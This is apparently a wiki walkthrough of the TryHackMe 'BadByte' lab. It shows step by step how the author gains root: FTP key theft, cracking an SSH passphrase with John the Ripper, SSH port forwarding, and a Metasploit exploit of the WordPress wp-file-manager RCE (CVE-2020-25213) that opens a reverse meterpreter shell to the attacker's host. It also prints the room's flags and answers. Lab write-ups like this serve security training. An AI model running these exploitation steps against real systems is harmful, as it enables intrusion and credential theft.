TryHackMe-Badbyte

From aldeid
Jump to navigation Jump to search

Infiltrate BadByte and help us to take over root.

Reconnaissance

How many ports are open?

Running a Nmap full scan will reveal 2 ports:

[email protected]:/data/Badbyte$ nmap -A -p 22,30024 10.10.11.45
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-03 14:00 CEST
Nmap scan report for 10.10.11.45
Host is up (0.044s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
|   256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
|_  256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
30024/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          1743 Mar 23 20:03 id_rsa
|_-rw-r--r--    1 ftp      ftp            78 Mar 23 20:09 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.50.72
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.35 seconds

Answer: 2

What service is running on the lowest open port?

Answer: ssh

What non-standard port is open?

Answer: 30024

What service is running on the non-standard port?

Answer: ftp

Foothold

What username do we find during the enumeration process?

The FTP service allows anonymous connection:

[email protected]:/data/Badbyte$ ftp 10.10.11.45 30024
Connected to 10.10.11.45.
220 (vsFTPd 3.0.3)
Name (10.10.11.45:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Listing the files will reveal 2 files:

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 23 20:09 .
drwxr-xr-x    2 ftp      ftp          4096 Mar 23 20:09 ..
-rw-r--r--    1 ftp      ftp          1743 Mar 23 20:03 id_rsa
-rw-r--r--    1 ftp      ftp            78 Mar 23 20:09 note.txt
226 Directory send OK.

The txt file is a note that discloses a username: errorcauser.

ftp> get note.txt -
remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (78 bytes).
I always forget my password. Just let me store an ssh key here.
- errorcauser
226 Transfer complete.
78 bytes received in 0.00 secs (72.6831 kB/s)

We’ll download the id_rsa file as it is likely a SSH private key.

ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1743 bytes).
226 Transfer complete.
1743 bytes received in 0.00 secs (803.2791 kB/s)
ftp> exit
221 Goodbye.

Answer: errorcauser

What is the passphrase for the RSA private key?

Now, give the key the appropriate privileges and use it to connect against the SSH service. Unfortunately, it is password protected:

[email protected]:/data/Badbyte/files$ chmod 600 id_rsa 
[email protected]:/data/Badbyte/files$ ssh -i id_rsa [email protected]
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa': 

Let’s crack the key with John the Ripper:

[email protected]:/data/Badbyte/files$ /data/src/john/run/ssh2john.py id_rsa > ssh.hash
[email protected]:/data/Badbyte/files$ /data/src/john/run/john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cupcake          (id_rsa)
1g 0:00:00:14 DONE (2021-05-03 14:02) 0.06729g/s 965120p/s 965120c/s 965120C/sa6_123..*7¡Vamos!
Session completed. 

Answer: cupcake

Port forwarding

What main TCP ports are listening on localhost?

Now that we have the passphrase, we can connect. There is a note that lets us know there is a web server running, but only accessible to localhost.

-bash-4.4$ cat note.txt
Hi Error!
I've set up a webserver locally so no one outside could access it.
It is for testing purposes only.  There are still a few things I need to do like setting up a custom theme.
You can check it out, you already know what to do.
-Cth
:)

Disconnect and reconnect using the following option to setup Dynamic Port Forwarding using SSH:

[email protected]:/data/Badbyte/files$ ssh -i id_rsa -D 1337 [email protected]

Now, set up proxychains for the Dynamic Port Forwarding. Ensure you have commented out socks4 127.0.0.1 9050 in your proxychains configuration and have added socks5 127.0.0.1 1337 to the end of configuration file (/etc/proxychains.conf):

[email protected]:/etc$ egrep '^[^#]' /etc/proxychains.conf 
strict_chain
proxy_dns 
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5  127.0.0.1 1337

Running a port scan to enumerate internal ports on the server using proxychains will now reveal the web port, as well as MySQL:

[email protected]:/etc$ proxychains nmap -sT 127.0.0.1
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-03 14:29 CEST
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:80-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:5900-<--timeout
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:3389-<--timeout

[REDACTED]

|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:1048-<--timeout
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:49154-<--timeout
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:646-<--timeout
Nmap scan report for localhost (127.0.0.1)
Host is up (0.046s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 48.29 seconds

After finding the port of the webserver, perform Local Port Forwarding to that port using SSH with the -L flag:

[email protected]:/data/Badbyte/files$ sudo ssh -i id_rsa -L 80:127.0.0.1:80 [email protected]
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa': cupcake

Now, browsing http://127.0.0.1 will show the website that was supposed to be only accessible by localhost on the server.

Answer: 80,3306

What protocols are used for these ports?

Answer: http,mysql

Web exploitation

What CMS is running on the machine?

Browsing the web site (http://127.0.0.1) will show many indications about a Wordpress installation:

[email protected]:/etc$ curl -s http://127.0.0.1 | grep -i wordpress
<meta name="generator" content="WordPress 5.7" />
        </nav></section><section id="recent-comments-2" class="widget widget_recent_comments"><h2 class="widget-title">Recent Comments</h2><nav role="navigation" aria-label="Recent Comments"><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link"><a href='https://wordpress.org/' rel='external nofollow ugc' class='url'>A WordPress Commenter</a></span> on <a href="http://localhost/?p=1#comment-1">Welcome to Badbyte</a></li></ul></nav></section> </aside><!-- .widget-area -->
                Proudly powered by <a href="https://en-gb.wordpress.org/">WordPress</a>.        </div><!-- .powered-by -->

Answer: wordpress

Can you find any vulnerable plugins?

Using the http-wordpress-enum Nmap script will reveal 2 plugins:

[email protected]:/etc$ nmap -p 80 -vv --script http-wordpress-enum --script-args type="plugins",search-limit=1500 127.0.0.1
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-03 18:01 CEST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 18:01
Completed NSE at 18:01, 0.00s elapsed
Initiating Ping Scan at 18:01
Scanning 127.0.0.1 [2 ports]
Completed Ping Scan at 18:01, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 18:01
Scanning localhost (127.0.0.1) [1 port]
Discovered open port 80/tcp on 127.0.0.1
Completed Connect Scan at 18:01, 0.00s elapsed (1 total ports)
NSE: Script scanning 127.0.0.1.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 18:01
Completed NSE at 18:01, 6.66s elapsed
Nmap scan report for localhost (127.0.0.1)
Host is up, received syn-ack (0.00025s latency).
Scanned at 2021-05-03 18:01:27 CEST for 7s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-wordpress-enum: 
| Search limited to top 1500 themes/plugins
|   plugins
|     duplicator 1.3.26
|_    wp-file-manager 6.0

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 18:01
Completed NSE at 18:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.93 seconds

Two plugins are detected: * duplicator 1.3.26 * wp-file-manager 6.0

What is the CVE number for directory traversal vulnerability?

Searching on the Internet for cve wordpress duplicator directory traversal leads to CVE-2020-11738

Answer: CVE-2020-11738

What is the CVE number for remote code execution vulnerability?

Searching for cve wordpress remote code execution file manager leads to CVE-2020-25213.

Answer: CVE-2020-25213

Metasploit

There is a metasploit module for the exploit. You can use it to get the reverse shell. If you are feeling lucky you can follow any POC( Proof of Concept).

Fire up Metasploit and search for wp-file-manager. It will show an exploit.

[email protected]:~$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > search wp-file-manager

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  exploit/multi/http/wp_file_manager_rce  2020-09-09       normal  Yes    WordPress File Manager Unauthenticated Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_file_manager_rce

What is the name of user that was running CMS?

Let’s use this exploit to get a reverse meterpreter session.

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set LHOST 10.8.50.72
LHOST => 10.8.50.72
msf6 exploit(multi/http/wp_file_manager_rce) > run

[*] Started reverse TCP handler on 10.8.50.72:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] 127.0.0.1:80 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/CMRdTO.php
[*] Sending stage (39282 bytes) to 10.10.221.123
[+] Deleted CMRdTO.php
[*] Meterpreter session 1 opened (10.8.50.72:4444 -> 10.10.221.123:58718) at 2021-05-03 19:42:28 +0200

meterpreter > getuid
Server username: cth (1000)

Answer: cth

What is the user flag?

meterpreter > shell
Process 1735 created.
Channel 0 created.

python3 -c "import pty;pty.spawn('/bin/bash')"
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

<ress/wp-content/plugins/wp-file-manager/lib/files$ cd /home
cd /home
[email protected]:/home$ ls -la
ls -la
total 16
drwxr-xr-x  4 root root 4096 Mar 23 19:50 .
drwxr-xr-x 24 root root 4096 Mar 22 18:02 ..
drwxr-xr-x  4 cth  cth  4096 Mar 23 21:44 cth
drwxr-xr-x  8 root root 4096 Mar 23 21:30 errorcauser
[email protected]:/home$ ls -l cth
ls -l cth
total 4
-rw-rw-r-- 1 cth cth 38 Mar 23 21:36 user.txt
[email protected]:/home$ cat cth/user.txt            
cat cth/user.txt
THM{227906201d17d9c45aa93d0122ea1af7}

User flag: THM{227906201d17d9c45aa93d0122ea1af7}

Privilege Escalation

What is the user’s old password?

Searching for files owned by cth will show a long list of files, with an interesting bash.log file:

c[email protected]:/home$ find / -type f -user cth -exec ls {} + 2>/dev/null
find / -type f -user cth -exec ls {} + 2>/dev/null
/home/cth/.bash_logout
/home/cth/.bashrc
/home/cth/.cache/motd.legal-displayed
/home/cth/.profile

[REDACTED]

/usr/share/wordpress/wp-snapshots/robots.txt
/usr/share/wordpress/xmlrpc.php
/var/log/bash.log <-------------------------------- interesting!

Having a look at this file will show the last commands entered by the user, who typed his old password as a command, by mistake:

[email protected]:/home$ cat /var/log/bash.log
cat /var/log/bash.log
Script started on 2021-03-23 21:05:06+0000
[email protected]:~$ whoami
cth
[email protected]:~$ date
Tue 23 Mar 21:05:14 UTC 2021
[email protected]:~$ suod su

Command 'suod' not found, did you mean:

  command 'sudo' from deb sudo
  command 'sudo' from deb sudo-ldap

Try: sudo apt install <deb name>

[email protected]:~$ [email protected]$sw0rd2020 <----------------------- old password
[email protected]: command not found
[email protected]:~$ passwd
Changing password for cth.
(current) UNIX password: 
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully

[redACTED]

Answer: [email protected]$sw0rd2020

What is the root flag?

Trying the old password won’t work, but trying to increment the year (2021 instead of 2020 at the end of the password) leads to a succesfull connection. The user has full access with sudo.

[email protected]:/home$ sudo -l
sudo -l
[sudo] password for cth: [email protected]$sw0rd2021

Matching Defaults entries for cth on badbyte:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cth may run the following commands on badbyte:
    (ALL : ALL) ALL
[email protected]:/home$ sudo -s
sudo -s
[email protected]:/home# cd /root
cd /root
[email protected]:~# ll
ll
total 24
drwx------  3 root root 4096 Mar 23 21:54 ./
drwxr-xr-x 24 root root 4096 Mar 22 18:02 ../
lrwxrwxrwx  1 root root    9 Mar 23 21:16 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Mar 22 18:31 .ssh/
-rw-r--r--  1 root root 1185 Mar 23 21:37 root.txt
[email protected]:~# cat root.txt
cat root.txt
  |      ______    ________   ________              ______        _____________ __________  |
  |     / ____ \  /  ___   \ /   ____ \            / ____ \      /____    ____//   ______/\ |
  |    / /___/_/ /  /__/   //   /   / /\          / /___/_/      \___/   /\___/   /______\/ |
  |   / _____ \ /  ____   //   /   / / /         / _____ \ __   ___ /   / /  /   ____/\     |
  |  / /____/ //  / __/  //   /___/ / /         / /____/ //  | /  //   / /  /   /____\/     |
  | /________//__/ / /__//_________/ /         /________/ |  \/  //___/ /  /   /________    |
  | \________\\__\/  \__\\_________\/          \________\  \    / \___\/  /____________/\   | 
  |                                  _________           __/   / /        \____________\/   |
  |                                 /________/\         /_____/ /                           |
  |                                 \________\/         \_____\/                            |

THM{ad485b44f63393b6a9225974909da5fa}

 ________________________
< Made with ❤ by BadByte >
 ------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Root flag: THM{ad485b44f63393b6a9225974909da5fa}